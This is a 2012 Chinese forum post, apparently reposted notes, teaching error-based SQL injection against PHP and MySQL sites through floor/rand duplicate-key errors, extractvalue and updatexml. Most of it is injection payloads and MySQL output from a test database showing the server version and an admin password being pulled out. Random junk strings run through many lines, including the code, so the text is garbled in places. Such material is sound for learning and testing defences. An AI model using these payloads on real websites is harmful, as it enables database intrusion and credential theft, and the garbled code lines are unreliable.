放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
( B( y/ G$ J/ S实际测试环境:) n' m4 W4 }% d; I, z$ M, V; @
7 }0 O/ }" A1 D8 Q4 G9 X. o* c } : u- E6 u0 ?. J' Z0 l$ m+ o
mysql> show tables;! z( l& X, }7 W- I' j2 p
+----------------+$ b: L" p( A L! ?- z# i# L
| Tables_in_test |
, S3 \ F4 N* j+ `+----------------+
7 R1 P& z+ X1 I/ T+ M: t| admin |
& w0 W+ @+ Z5 G2 b# ]| article |+ ^; J7 [1 k- }8 X( Q' v5 @
+----------------+
, \+ N* ?4 Q( l- F
8 V# Q7 `( G7 e+ E; J
2 \9 c7 i2 M3 ?3 Y5 i2 ] 8 A3 K4 F& o0 }
mysql> describe admin;7 K7 r7 c7 M9 S
+-------+------------------+------+-----+---------+----------------+
$ x7 Z2 \+ _2 m B: W w| Field | Type | Null | Key | Default | Extra |
& U9 M1 l q4 E8 T) |2 ?# u8 y. `( f+-------+------------------+------+-----+---------+----------------+
+ `9 w# m: P% R9 c( p| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
E# _ B( o+ p| user | varchar(50) | NO | | NULL | |) K5 A0 s- T7 [& m4 V
| pass | varchar(50) | NO | | NULL | |( ^1 j1 R% g1 s, g
+-------+------------------+------+-----+---------+----------------+ R$ C7 y/ e# F5 q _
0 |) p6 B/ `+ @5 R- i
: D- j1 M$ e+ j' Y% n2 a
% }. X& H7 A- d' E7 B5 lmysql> describe article;
" |3 u1 q1 r% `: d+---------+------------------+------+-----+---------+----------------+2 p* g9 T1 J) ~; Q8 j/ X
| Field | Type | Null | Key | Default | Extra |3 N% o5 u& F1 I3 n$ I1 \6 r1 l
+---------+------------------+------+-----+---------+----------------+
! r3 r( C3 j6 O! G0 j: N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |) \5 S# l$ c, u" _$ V
| title | varchar(50) | NO | | NULL | |; M* x1 k; D' m8 A. s4 u4 w
| content | varchar(50) | NO | | NULL | |
! N* R9 N4 N( p4 @7 X7 e8 c( P5 U" z+---------+------------------+------+-----+---------+----------------+0 G5 X6 W! L' o
1、通过floor报错
! s9 n/ r) v0 W% ~! v w可以通过如下一些利用代码$ a1 i; e' U$ Z; f% @3 M1 M
6 V7 P& s8 K7 [
: ^4 B- k+ _: n9 a) ^% e; a
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x( o: p- m! d' P1 y5 z( e
from information_schema.tables group by x)a);
& e# i- z' ?- T6 i8 S& ~
$ N8 d7 S, O0 m9 O6 B - F) E: h! R- J% p# ^; i5 b3 h }
and (select count(*) from (select 1 union select null union select !1)x( y+ z* R+ _0 Q! Q; v. |; v
group by concat((select table_name from information_schema.tables limit 1),
& O E+ ]* \" e" ]" ]: V+ \9 K: Mfloor(rand(0)*2)));
# @, o5 q7 l9 C5 c6 U举例如下:
1 ]* `/ y! g$ V+ [( e1 e. q) h* f首先进行正常查询:+ q/ J( K7 M' p+ v- N0 v
. E4 G3 H' V, j% G2 Y* {9 R
mysql> select * from article where id = 1;
; Q1 K- n. f! X+----+-------+---------+( r- b4 k; F* n8 L# r
| id | title | content |
) _# a) h1 @/ |: k2 ]( P# R+----+-------+---------+
# r$ C2 P; K( x! A% K| 1 | test | do it |
9 R$ c# g3 S5 V1 j' Q+----+-------+---------+$ l8 O% K$ u* I9 g& e# T; r$ k3 o
假如id输入存在注入的话,可以通过如下语句进行报错。1 R. c7 u5 L6 s' T
2 Z Z+ {( f% X: o
& k. A1 x# I% i9 j1 ?% v. s5 Q; i: ]/ F( `
mysql> select * from article where id = 1 and (select 1 from' \" J9 y2 l |; j. j1 w( g+ t
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
' e* z! z/ V/ `1 o8 [; ~7 e/ `ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
/ C9 x, X6 R* j- N% O7 T5 e可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
9 h" } ]/ P; b; a例如我们需要查询管理员用户名和密码:
) i: L) I+ P$ Z' bMethod1:
* {) @; d7 v1 O2 }8 l
" q1 g4 d) c2 ]3 v( P 2 q$ a% Y( I8 r; g; d( F* Y
mysql> select * from article where id = 1 and (select 1 from+ w' u' [0 e& Q4 c( \1 Z l
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
1 G/ R; z, E5 _from information_schema.tables group by x)a);. D" q; m5 I! W. A: f! K' Q2 P# Z
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'# v6 h: f( G/ }5 j
Method2:% E/ j. ^1 L2 B% T4 R
! y/ _! o; B' B' y
: m2 ~7 J8 m. k$ O$ B5 `/ T9 @1 S
mysql> select * from article where id = 1 and (select count(*)7 @+ d' u1 w: ]' A' e% l3 D
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),1 b2 H4 j0 v% [* ^" l
floor(rand(0)*2)));
9 w% q* C% X6 Y- f; h/ J" zERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
" w. P8 Y3 x( m4 m) h2、ExtractValue
+ g c& @9 i1 H8 J" a+ K" N测试语句如下 X- x* J. R' |! c
2 ~, l# s; x! y `3 G: V+ g5 F
5 x+ b6 X6 u9 hand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
( A5 g7 o$ P M, f5 T9 H o实际测试过程/ j h5 u, c4 u* p; F
0 m7 {, Z( j( R2 k" y 7 G9 ]. b# J+ u4 o% \; {7 V$ f2 }
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,8 A" s3 y7 G! Z
(select pass from admin limit 1)));--/ _ v- X. s6 t1 N" Z. ]* n
ERROR 1105 (HY000): XPATH syntax error: '\admin888'/ q3 N- V$ c4 h/ j8 s# U
3、UpdateXml3 W! z4 ?* q/ Q+ n% m
测试语句9 ~2 [9 q& s/ v% P M
! C( M9 w/ i' Q' b/ x; x* v/ T
& ?* V L9 h6 I1 Y
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))/ P3 b9 U, D, `4 t. A- P1 I- Q
实际测试过程
$ u& x- z( l4 ~
; F- ^) e+ U$ G( H, w* _) I
! s/ T; m! a \" ^5 m/ Q& bmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
/ M; q! E1 K' \' O3 n" Q9 _5 a(select pass from admin limit 1),0x5e24),1));6 m& ?% n. K% B7 v8 z: P8 y2 O4 ]
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'( M* F0 Q2 Y. B
All, thanks foreign guys.
+ ~: V D, T3 o4 e
8 O( d* q" j+ q! I' _3 G, n, z$ x5 T5 ?2 G' d7 f H4 i
|
发表于 2012-12-10 10:28:51
收藏
支持
反对